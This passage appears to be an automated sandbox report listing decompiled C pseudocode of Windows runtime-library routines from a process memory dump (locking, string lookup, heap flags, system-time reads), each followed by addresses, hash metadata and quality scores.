                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                        					E02BAEB70(_t93, 0x2c879a0);
                        					if( *((char*)(_t108 + 0xf)) != 0) {
                        						_t101 =  *0x7ffe02dc;
                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                        							L9:
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0x90028);
                        							_push(_t108 + 0x20);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push( *((intOrPtr*)(_t104 + 4)));
                        							_t53 = E02BD9890();
                        							__eflags = _t53;
                        							if(_t53 >= 0) {
                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        									E02BAEEF0(0x2c879a0);
                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                        									E02BAEB70(0, 0x2c879a0);
                        								}
                        								goto L3;
                        							}
                        							__eflags = _t53 - 0xc0000012;
                        							if(__eflags == 0) {
                        								L12:
                        								_t13 = _t104 + 0xc; // 0x2732be5
                        								_t93 = _t13;
                        								 *((char*)(_t108 + 0x12)) = 0;
                        								__eflags = E02BCF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								if(__eflags >= 0) {
                        									L15:
                        									_t102 = _v28;
                        									 *_t102 = 2;
                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        									E02BAEEF0(0x2c879a0);
                        									__eflags =  *0x2c88210 - _t104; // 0x2732bd8
                        									if(__eflags == 0) {
                        										__eflags =  *((char*)(_t108 + 0xe));
                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                        										 *0x2c88210 = _t102;
                        										_t32 = _t102 + 0xc; // 0x0
                        										 *_t95 =  *_t32;
                        										_t33 = _t102 + 0x10; // 0x0
                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                        										_t35 = _t102 + 4; // 0xffffffff
                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                        										if(__eflags != 0) {
                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                        											E02C14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                        										}
                        										E02BAEB70(_t95, 0x2c879a0);
                        										asm("lock xadd [esi], eax");
                        										if(__eflags == 0) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02BD95D0();
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										asm("lock xadd [esi], ebx");
                        										__eflags = _t89 == 1;
                        										if(_t89 == 1) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02BD95D0();
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										_t49 = _t102;
                        										L4:
                        										return _t49;
                        									}
                        									E02BAEB70(_t93, 0x2c879a0);
                        									asm("lock xadd [esi], eax");
                        									if(__eflags == 0) {
                        										_push( *((intOrPtr*)(_t104 + 4)));
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        									}
                        									 *_t102 = 1;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										_t28 = _t102 + 4; // 0xffffffff
                        										_push( *_t28);
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        									}
                        									continue;
                        								}
                        								_t93 =  &_v20;
                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                        								_t85 = 6;
                        								_v20 = _t85;
                        								_t87 = E02BCF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								__eflags = _t87;
                        								if(_t87 < 0) {
                        									goto L3;
                        								}
                        								 *((char*)(_t108 + 0xe)) = 1;
                        								goto L15;
                        							}
                        							__eflags = _t53 - 0xc000026e;
                        							if(__eflags != 0) {
                        								goto L3;
                        							}
                        							goto L12;
                        						}
                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                        							goto L3;
                        						} else {
                        							goto L9;
                        						}
                        					}
                        					L3:
                        					_t49 = _t104;
                        					goto L4;
                        				}
                        				_t49 = 0;
                        				goto L4;
                        			}

























                        0x02b952a5
                        0x02b952ad
                        0x02b952b0
                        0x02b952b3
                        0x02b952b7
                        0x02b952ba
                        0x02b952bf
                        0x02b952c4
                        0x02b952cc
                        0x00000000
                        0x00000000
                        0x02b952ce
                        0x02b952d9
                        0x02b952dd
                        0x02b952e7
                        0x02b952f7
                        0x02b952f9
                        0x02b952fd
                        0x02bf0dcf
                        0x02bf0dd5
                        0x02bf0dd6
                        0x02bf0dd7
                        0x02bf0dd8
                        0x02bf0dd9
                        0x02bf0dde
                        0x02bf0ddf
                        0x02bf0de0
                        0x02bf0de1
                        0x02bf0de2
                        0x02bf0de5
                        0x02bf0dea
                        0x02bf0dec
                        0x02bf0f60
                        0x02bf0f64
                        0x02bf0f70
                        0x02bf0f76
                        0x02bf0f79
                        0x02bf0f79
                        0x00000000
                        0x02bf0f64
                        0x02bf0df2
                        0x02bf0df7
                        0x02bf0e04
                        0x02bf0e0d
                        0x02bf0e0d
                        0x02bf0e10
                        0x02bf0e1a
                        0x02bf0e1c
                        0x02bf0e4c
                        0x02bf0e52
                        0x02bf0e61
                        0x02bf0e67
                        0x02bf0e6b
                        0x02bf0e70
                        0x02bf0e76
                        0x02bf0ed7
                        0x02bf0edc
                        0x02bf0ee0
                        0x02bf0ee6
                        0x02bf0eea
                        0x02bf0eed
                        0x02bf0ef0
                        0x02bf0ef3
                        0x02bf0ef6
                        0x02bf0ef9
                        0x02bf0efe
                        0x02bf0f01
                        0x02bf0f01
                        0x02bf0f0b
                        0x02bf0f12
                        0x02bf0f16
                        0x02bf0f18
                        0x02bf0f1b
                        0x02bf0f2c
                        0x02bf0f31
                        0x02bf0f31
                        0x02bf0f35
                        0x02bf0f39
                        0x02bf0f3a
                        0x02bf0f3c
                        0x02bf0f3f
                        0x02bf0f50
                        0x02bf0f55
                        0x02bf0f55
                        0x02bf0f59
                        0x02b952eb
                        0x02b952f1
                        0x02b952f1
                        0x02bf0e7d
                        0x02bf0e84
                        0x02bf0e88
                        0x02bf0e8a
                        0x02bf0e8d
                        0x02bf0e9e
                        0x02bf0ea3
                        0x02bf0ea3
                        0x02bf0ea7
                        0x02bf0eaf
                        0x02bf0eb3
                        0x02bf0eb9
                        0x02bf0eb9
                        0x02bf0ebc
                        0x02bf0ecd
                        0x02bf0ecd
                        0x00000000
                        0x02bf0eb3
                        0x02bf0e21
                        0x02bf0e2b
                        0x02bf0e2f
                        0x02bf0e30
                        0x02bf0e3a
                        0x02bf0e3f
                        0x02bf0e41
                        0x00000000
                        0x00000000
                        0x02bf0e47
                        0x00000000
                        0x02bf0e47
                        0x02bf0df9
                        0x02bf0dfe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf0dfe
                        0x02b95303
                        0x02b95307
                        0x00000000
                        0x02b95309
                        0x00000000
                        0x02b95309
                        0x02b95307
                        0x02b952e9
                        0x02b952e9
                        0x00000000
                        0x02b952e9
                        0x02b9530e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7416dd16262ec4a377432cc390212df0ff6a2ed21289e60f7172a79e1f4fc000
                        • Instruction ID: 9de21a7f6e401889c7e7dd15a490039ea30a2ea6ede13519824eff0ca4a48706
                        • Opcode Fuzzy Hash: 7416dd16262ec4a377432cc390212df0ff6a2ed21289e60f7172a79e1f4fc000
                        • Instruction Fuzzy Hash: 0C51F171149741AFDB21EF28C840B27FBE5FF44714F1049AEE49587661E770E848CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                        				signed short* _v8;
                        				signed short* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				short _t56;
                        				signed int _t57;
                        				intOrPtr _t58;
                        				signed short* _t61;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				intOrPtr _t84;
                        				intOrPtr _t87;
                        				intOrPtr* _t90;
                        				signed short* _t91;
                        				signed int _t95;
                        				signed short* _t96;
                        				intOrPtr _t97;
                        				intOrPtr _t102;
                        				signed int _t108;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed short* _t112;
                        				void* _t113;
                        				signed int _t116;
                        				signed short** _t119;
                        				short* _t120;
                        				signed int _t123;
                        				signed int _t124;
                        				void* _t125;
                        				intOrPtr _t127;
                        				signed int _t128;
                        
                        				_t90 = __ecx;
                        				_v16 = __edx;
                        				_t108 = _a4;
                        				_v28 = __ecx;
                        				_t4 = _t108 - 1; // -1
                        				if(_t4 > 0x13) {
                        					L15:
                        					_t56 = 0xc0000100;
                        					L16:
                        					return _t56;
                        				}
                        				_t57 = _t108 * 0x1c;
                        				_v32 = _t57;
                        				_t6 = _t57 + 0x2c88204; // 0x0
                        				_t123 =  *_t6;
                        				_t7 = _t57 + 0x2c88208; // 0x2c88207
                        				_t8 = _t57 + 0x2c88208; // 0x2c88207
                        				_t119 = _t8;
                        				_v36 = _t123;
                        				_t110 = _t7 + _t123 * 8;
                        				_v24 = _t110;
                        				_t111 = _a4;
                        				if(_t119 >= _t110) {
                        					L12:
                        					if(_t123 != 3) {
                        						_t58 =  *0x2c88450; // 0x27310fc
                        						if(_t58 == 0) {
                        							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                        						}
                        					} else {
                        						_t26 = _t57 + 0x2c8821c; // 0x0
                        						_t58 =  *_t26;
                        					}
                        					 *_t90 = _t58;
                        					goto L15;
                        				} else {
                        					goto L2;
                        				}
                        				while(1) {
                        					_t116 =  *_t61 & 0x0000ffff;
                        					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        					if(_t116 == _t128) {
                        						goto L18;
                        					}
                        					L5:
                        					if(_t116 >= 0x61) {
                        						if(_t116 > 0x7a) {
                        							_t97 =  *0x2c86d5c; // 0x7ff00654
                        							_t72 =  *0x2c86d5c; // 0x7ff00654
                        							_t75 =  *0x2c86d5c; // 0x7ff00654
                        							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                        						} else {
                        							_t116 = _t116 - 0x20;
                        						}
                        					}
                        					if(_t128 >= 0x61) {
                        						if(_t128 > 0x7a) {
                        							_t102 =  *0x2c86d5c; // 0x7ff00654
                        							_t84 =  *0x2c86d5c; // 0x7ff00654
                        							_t87 =  *0x2c86d5c; // 0x7ff00654
                        							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                        						} else {
                        							_t128 = _t128 - 0x20;
                        						}
                        					}
                        					if(_t116 == _t128) {
                        						_t61 = _v12;
                        						_t96 = _v8;
                        					} else {
                        						_t113 = _t116 - _t128;
                        						L9:
                        						_t111 = _a4;
                        						if(_t113 == 0) {
                        							_t115 =  &(( *_t119)[_t111 + 1]);
                        							_t33 =  &(_t119[1]); // 0x100
                        							_t120 = _a8;
                        							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                        							_t35 = _t95 - 1; // 0xff
                        							_t124 = _t35;
                        							if(_t120 == 0) {
                        								L27:
                        								 *_a16 = _t95;
                        								_t56 = 0xc0000023;
                        								goto L16;
                        							}
                        							if(_t124 >= _a12) {
                        								if(_a12 >= 1) {
                        									 *_t120 = 0;
                        								}
                        								goto L27;
                        							}
                        							 *_a16 = _t124;
                        							_t125 = _t124 + _t124;
                        							E02BDF3E0(_t120, _t115, _t125);
                        							_t56 = 0;
                        							 *((short*)(_t125 + _t120)) = 0;
                        							goto L16;
                        						}
                        						_t119 =  &(_t119[2]);
                        						if(_t119 < _v24) {
                        							L2:
                        							_t91 =  *_t119;
                        							_t61 = _t91;
                        							_v12 = _t61;
                        							_t112 =  &(_t61[_t111]);
                        							_v8 = _t112;
                        							if(_t61 >= _t112) {
                        								break;
                        							} else {
                        								_t127 = _v16 - _t91;
                        								_t96 = _t112;
                        								_v20 = _t127;
                        								_t116 =  *_t61 & 0x0000ffff;
                        								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        								if(_t116 == _t128) {
                        									goto L18;
                        								}
                        								goto L5;
                        							}
                        						} else {
                        							_t90 = _v28;
                        							_t57 = _v32;
                        							_t123 = _v36;
                        							goto L12;
                        						}
                        					}
                        					L18:
                        					_t61 =  &(_t61[1]);
                        					_v12 = _t61;
                        					if(_t61 >= _t96) {
                        						break;
                        					}
                        					_t127 = _v20;
                        				}
                        				_t113 = 0;
                        				goto L9;
                        			}






































                        0x02bc2ae4
                        0x02bc2aec
                        0x02bc2aef
                        0x02bc2af4
                        0x02bc2af7
                        0x02bc2afd
                        0x02bc2b92
                        0x02bc2b92
                        0x02bc2b97
                        0x02bc2b9c
                        0x02bc2b9c
                        0x02bc2b03
                        0x02bc2b06
                        0x02bc2b09
                        0x02bc2b09
                        0x02bc2b0f
                        0x02bc2b15
                        0x02bc2b15
                        0x02bc2b1b
                        0x02bc2b1e
                        0x02bc2b21
                        0x02bc2b26
                        0x02bc2b29
                        0x02bc2b81
                        0x02bc2b84
                        0x02bc2c0e
                        0x02bc2c15
                        0x02bc2c24
                        0x02bc2c24
                        0x02bc2b8a
                        0x02bc2b8a
                        0x02bc2b8a
                        0x02bc2b8a
                        0x02bc2b90
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc2b4a
                        0x02bc2b4a
                        0x02bc2b4d
                        0x02bc2b53
                        0x00000000
                        0x00000000
                        0x02bc2b55
                        0x02bc2b58
                        0x02bc2bb7
                        0x02c05d1b
                        0x02c05d37
                        0x02c05d47
                        0x02c05d53
                        0x02bc2bbd
                        0x02bc2bbd
                        0x02bc2bbd
                        0x02bc2bb7
                        0x02bc2b5d
                        0x02bc2c2f
                        0x02c05d5b
                        0x02c05d77
                        0x02c05d87
                        0x02c05d93
                        0x02bc2c35
                        0x02bc2c35
                        0x02bc2c35
                        0x02bc2c2f
                        0x02bc2b65
                        0x02bc2b9f
                        0x02bc2ba2
                        0x02bc2b67
                        0x02bc2b67
                        0x02bc2b69
                        0x02bc2b6b
                        0x02bc2b6e
                        0x02bc2bc9
                        0x02bc2bcc
                        0x02bc2bcf
                        0x02bc2bd4
                        0x02bc2bd6
                        0x02bc2bd6
                        0x02bc2bdb
                        0x02bc2c02
                        0x02bc2c05
                        0x02bc2c07
                        0x00000000
                        0x02bc2c07
                        0x02bc2be0
                        0x02bc2c00
                        0x02bc2c3f
                        0x02bc2c3f
                        0x00000000
                        0x02bc2c00
                        0x02bc2be5
                        0x02bc2be7
                        0x02bc2bec
                        0x02bc2bf4
                        0x02bc2bf6
                        0x00000000
                        0x02bc2bf6
                        0x02bc2b70
                        0x02bc2b76
                        0x02bc2b2b
                        0x02bc2b2b
                        0x02bc2b2d
                        0x02bc2b2f
                        0x02bc2b32
                        0x02bc2b35
                        0x02bc2b3a
                        0x00000000
                        0x02bc2b40
                        0x02bc2b43
                        0x02bc2b45
                        0x02bc2b47
                        0x02bc2b4a
                        0x02bc2b4d
                        0x02bc2b53
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc2b53
                        0x02bc2b78
                        0x02bc2b78
                        0x02bc2b7b
                        0x02bc2b7e
                        0x00000000
                        0x02bc2b7e
                        0x02bc2b76
                        0x02bc2ba5
                        0x02bc2ba5
                        0x02bc2ba8
                        0x02bc2bad
                        0x00000000
                        0x00000000
                        0x02bc2baf
                        0x02bc2baf
                        0x02bc2bc2
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3148e527dc0f969df253b72df349743e080e391378e71815a2163304fbb71c72
                        • Instruction ID: b47dbf644af7716014b605980f6201d59fce9be113dfc116959744f26af9c3ce
                        • Opcode Fuzzy Hash: 3148e527dc0f969df253b72df349743e080e391378e71815a2163304fbb71c72
                        • Instruction Fuzzy Hash: A6518176A00115CFCB18DF2DC890ABDB7B1FB88704726859EEC56AB354E734AE51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02C5AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __esi;
                        				void* __ebp;
                        				signed short* _t36;
                        				signed int _t41;
                        				char* _t42;
                        				intOrPtr _t43;
                        				signed int _t47;
                        				void* _t52;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed char _t62;
                        				signed int _t72;
                        				signed char _t85;
                        				signed int _t88;
                        
                        				_t73 = __edx;
                        				_push(__ecx);
                        				_t85 = __ecx;
                        				_v8 = __edx;
                        				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                        				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                        				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                        					_t57 = _t57 | 0x00000001;
                        				}
                        				_t88 = 0;
                        				_t36 = 0;
                        				_t96 = _a12;
                        				if(_a12 == 0) {
                        					_t62 = _a8;
                        					__eflags = _t62;
                        					if(__eflags == 0) {
                        						goto L12;
                        					}
                        					_t52 = E02C5C38B(_t85, _t73, _t57, 0);
                        					_t62 = _a8;
                        					 *_t62 = _t52;
                        					_t36 = 0;
                        					goto L11;
                        				} else {
                        					_t36 = E02C5ACFD(_t85, _t73, _t96, _t57, _a8);
                        					if(0 == 0 || 0 == 0xffffffff) {
                        						_t72 = _t88;
                        					} else {
                        						_t72 =  *0x00000000 & 0x0000ffff;
                        					}
                        					 *_a12 = _t72;
                        					_t62 = _a8;
                        					L11:
                        					_t73 = _v8;
                        					L12:
                        					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                        						L19:
                        						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                        							L22:
                        							_t74 = _v8;
                        							__eflags = _v8;
                        							if(__eflags != 0) {
                        								L25:
                        								__eflags = _t88 - 2;
                        								if(_t88 != 2) {
                        									__eflags = _t85 + 0x44 + (_t88 << 6);
                        									_t88 = E02C5FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                        									goto L34;
                        								}
                        								L26:
                        								_t59 = _v8;
                        								E02C5EA55(_t85, _v8, _t57);
                        								asm("sbb esi, esi");
                        								_t88 =  ~_t88;
                        								_t41 = E02BB7D50();
                        								__eflags = _t41;
                        								if(_t41 == 0) {
                        									_t42 = 0x7ffe0380;
                        								} else {
                        									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								}
                        								__eflags =  *_t42;
                        								if( *_t42 != 0) {
                        									_t43 =  *[fs:0x30];
                        									__eflags =  *(_t43 + 0x240) & 0x00000001;
                        									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											E02C51608(_t85, _t59, 3);
                        										}
                        									}
                        								}
                        								goto L34;
                        							}
                        							_push(_t62);
                        							_t47 = E02C61536(0x2c88ae4, (_t74 -  *0x2c88b04 >> 0x14) + (_t74 -  *0x2c88b04 >> 0x14), _t88, __eflags);
                        							__eflags = _t47;
                        							if(_t47 == 0) {
                        								goto L26;
                        							}
                        							_t74 = _v12;
                        							_t27 = _t47 - 1; // -1
                        							_t88 = _t27;
                        							goto L25;
                        						}
                        						_t62 = _t85;
                        						if(L02C5C323(_t62, _v8, _t57) != 0xffffffff) {
                        							goto L22;
                        						}
                        						_push(_t62);
                        						_push(_t88);
                        						E02C5A80D(_t85, 9, _v8, _t88);
                        						goto L34;
                        					} else {
                        						_t101 = _t36;
                        						if(_t36 != 0) {
                        							L16:
                        							if(_t36 == 0xffffffff) {
                        								goto L19;
                        							}
                        							_t62 =  *((intOrPtr*)(_t36 + 2));
                        							if((_t62 & 0x0000000f) == 0) {
                        								goto L19;
                        							}
                        							_t62 = _t62 & 0xf;
                        							if(E02C3CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                        								L34:
                        								return _t88;
                        							}
                        							goto L19;
                        						}
                        						_t62 = _t85;
                        						_t36 = E02C5ACFD(_t62, _t73, _t101, _t57, _t62);
                        						if(_t36 == 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        			}



















                        0x02c5ae44
                        0x02c5ae4c
                        0x02c5ae53
                        0x02c5ae55
                        0x02c5ae5c
                        0x02c5ae64
                        0x02c5ae68
                        0x02c5ae75
                        0x02c5ae75
                        0x02c5ae78
                        0x02c5ae7a
                        0x02c5ae7c
                        0x02c5ae7f
                        0x02c5aea8
                        0x02c5aeab
                        0x02c5aead
                        0x00000000
                        0x00000000
                        0x02c5aeb3
                        0x02c5aeb8
                        0x02c5aebb
                        0x02c5aebd
                        0x00000000
                        0x02c5ae81
                        0x02c5ae88
                        0x02c5ae8f
                        0x02c5ae9b
                        0x02c5ae96
                        0x02c5ae96
                        0x02c5ae96
                        0x02c5aea0
                        0x02c5aea3
                        0x02c5aebf
                        0x02c5aebf
                        0x02c5aec3
                        0x02c5aec9
                        0x02c5af0d
                        0x02c5af14
                        0x02c5af3d
                        0x02c5af3d
                        0x02c5af41
                        0x02c5af44
                        0x02c5af67
                        0x02c5af67
                        0x02c5af6a
                        0x02c5afca
                        0x02c5afd1
                        0x00000000
                        0x02c5afd1
                        0x02c5af6c
                        0x02c5af6d
                        0x02c5af75
                        0x02c5af7c
                        0x02c5af7e
                        0x02c5af80
                        0x02c5af85
                        0x02c5af87
                        0x02c5af99
                        0x02c5af89
                        0x02c5af92
                        0x02c5af92
                        0x02c5af9e
                        0x02c5afa1
                        0x02c5afa3
                        0x02c5afa9
                        0x02c5afb0
                        0x02c5afb2
                        0x02c5afb4
                        0x02c5afbc
                        0x02c5afbc
                        0x02c5afb4
                        0x02c5afb0
                        0x00000000
                        0x02c5afa1
                        0x02c5af4f
                        0x02c5af57
                        0x02c5af5c
                        0x02c5af5e
                        0x00000000
                        0x00000000
                        0x02c5af60
                        0x02c5af64
                        0x02c5af64
                        0x00000000
                        0x02c5af64
                        0x02c5af1a
                        0x02c5af25
                        0x00000000
                        0x00000000
                        0x02c5af27
                        0x02c5af28
                        0x02c5af33
                        0x00000000
                        0x02c5aed0
                        0x02c5aed0
                        0x02c5aed2
                        0x02c5aee1
                        0x02c5aee4
                        0x00000000
                        0x00000000
                        0x02c5aee6
                        0x02c5aeec
                        0x00000000
                        0x00000000
                        0x02c5aefb
                        0x02c5af07
                        0x02c5afd3
                        0x02c5afdb
                        0x02c5afdb
                        0x00000000
                        0x02c5af07
                        0x02c5aed6
                        0x02c5aed8
                        0x02c5aedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c5aedf
                        0x02c5aec9

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea90d092cd2b018ed1bb2da521ff187267fa8714900da5c62ab16f0d3e0f299d
                        • Instruction ID: a8864fb8625b9dbc3a141a20e465b8daee0a93e37e0ba8b9d3fa842bd4aa981a
                        • Opcode Fuzzy Hash: ea90d092cd2b018ed1bb2da521ff187267fa8714900da5c62ab16f0d3e0f299d
                        • Instruction Fuzzy Hash: E64128B27006705BC726CB27C894B7BB79AEFC4724F044319FC5687290DB75DA81DAA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02BBDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t54;
                        				char* _t58;
                        				signed int _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				signed int* _t75;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				char _t82;
                        				signed int _t83;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t90;
                        				intOrPtr _t92;
                        				signed int _t97;
                        				intOrPtr _t98;
                        				intOrPtr* _t99;
                        				signed int* _t101;
                        				signed int* _t102;
                        				intOrPtr* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				void* _t118;
                        
                        				_t92 = __edx;
                        				_t75 = _a4;
                        				_t98 = __ecx;
                        				_v44 = __edx;
                        				_t106 = _t75[1];
                        				_v40 = __ecx;
                        				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                        					_t82 = 0;
                        				} else {
                        					_t82 = 1;
                        				}
                        				_v5 = _t82;
                        				_t6 = _t98 + 0xc8; // 0xc9
                        				_t101 = _t6;
                        				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                        				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                        				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                        				if(_t82 != 0) {
                        					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                        					_t83 =  *_t75;
                        					_t54 = _t75[1];
                        					 *_t101 = _t83;
                        					_t84 = _t83 | _t54;
                        					_t101[1] = _t54;
                        					if(_t84 == 0) {
                        						_t101[1] = _t101[1] & _t84;
                        						 *_t101 = 1;
                        					}
                        					goto L19;
                        				} else {
                        					if(_t101 == 0) {
                        						E02B9CC50(E02B94510(0xc000000d));
                        						_t88 =  *_t101;
                        						_t97 = _t101[1];
                        						L15:
                        						_v12 = _t88;
                        						_t66 = _t88 -  *_t75;
                        						_t89 = _t97;
                        						asm("sbb ecx, [ebx+0x4]");
                        						_t118 = _t89 - _t97;
                        						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                        							_t66 = _t66 | 0xffffffff;
                        							_t89 = 0x7fffffff;
                        						}
                        						 *_t101 = _t66;
                        						_t101[1] = _t89;
                        						L19:
                        						if(E02BB7D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t58 = 0x7ffe0386;
                        						}
                        						_t102 = _v16;
                        						if( *_t58 != 0) {
                        							_t58 = E02C68ED6(_t102, _t98);
                        						}
                        						_t76 = _v44;
                        						E02BB2280(_t58, _v44);
                        						E02BBDD82(_v44, _t102, _t98);
                        						E02BBB944(_t102, _v5);
                        						return E02BAFFB0(_t76, _t98, _t76);
                        					}
                        					_t99 = 0x7ffe03b0;
                        					do {
                        						_t103 = 0x7ffe0010;
                        						do {
                        							_t67 =  *0x2c88628; // 0x0
                        							_v28 = _t67;
                        							_t68 =  *0x2c8862c; // 0x0
                        							_v32 = _t68;
                        							_v24 =  *((intOrPtr*)(_t99 + 4));
                        							_v20 =  *_t99;
                        							while(1) {
                        								_t97 =  *0x7ffe000c;
                        								_t90 =  *0x7FFE0008;
                        								if(_t97 ==  *_t103) {
                        									goto L10;
                        								}
                        								asm("pause");
                        							}
                        							L10:
                        							_t79 = _v24;
                        							_t99 = 0x7ffe03b0;
                        							_v12 =  *0x7ffe03b0;
                        							_t72 =  *0x7FFE03B4;
                        							_t103 = 0x7ffe0010;
                        							_v36 = _t72;
                        						} while (_v20 != _v12 || _t79 != _t72);
                        						_t73 =  *0x2c88628; // 0x0
                        						_t105 = _v28;
                        						_t80 =  *0x2c8862c; // 0x0
                        					} while (_t105 != _t73 || _v32 != _t80);
                        					_t98 = _v40;
                        					asm("sbb edx, [ebp-0x20]");
